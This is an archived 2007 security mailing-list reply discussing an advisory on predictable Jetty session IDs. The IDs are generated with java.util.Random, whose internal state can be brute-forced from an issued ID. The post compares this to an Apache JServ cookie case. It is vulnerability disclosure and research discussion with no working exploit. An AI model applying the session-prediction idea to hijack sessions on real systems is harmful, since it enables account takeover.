Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security VulnWatch
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Re: Jetty Session ID Prediction

from [Amit Klein] Network Security [Permanent Link]
Subject: Re: Jetty Session ID Prediction
Date: Mon, 05 Feb 2007 20:42:00 +0200
NGSSoftware Insight Security Research wrote: 
=================
Technical Details
=================

java.util.random implements a linear congruential generator, of the
following form:

synchronized protected int next(int bits) {
           seed = (seed * 0x5DEECE66DL + 0xBL) & ((1L << 48) - 1);
           return (int)(seed >>> (48 - bits));
     }

Jetty generates a 64-bit session id by generating two 32-bit numbers in
this way, so we end up with an encoded 64-bit integer. By decoding the
integer and splitting it into its two component 32-bit integers, we can
easily brute-force the generator's internal state.

So it outputs the full 64 bit integer (encoded), huh? consider yourself lucky ;-)
With Apache JServ, I had to deal with a session ID constructed in a similar manner, yet only the last 6 symbols were output (~31 bits out of the 64).
You can read about this in my "Hacking Web Applications Using Cookie Poisoning" (April 2002) - http://www.cgisecurity.com/lib/CookiePoisoningByline.pdf
Apache JServ is "example #2" in that text. You may find part of my analysis relevant to this (Jetty) case as well (BTW - do you plan to make your tool/source available?)

Regards,
-Amit

[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  Jetty Session ID Prediction, NGSSoftware Insight Security Research
Next by Date:  [Full-disclosure] iDefense Security Advisory 02.07.07: RARLabs Unrar Password Prompt Buffer Overflow Vulnerability, iDefense Labs
Previous by Thread:  Jetty Session ID Prediction, NGSSoftware Insight Security Research
Next by Thread:  [Full-disclosure] iDefense Security Advisory 02.07.07: RARLabs Unrar Password Prompt Buffer Overflow Vulnerability, iDefense Labs
Indexes:  [Date] [Thread] [Top] [All Lists]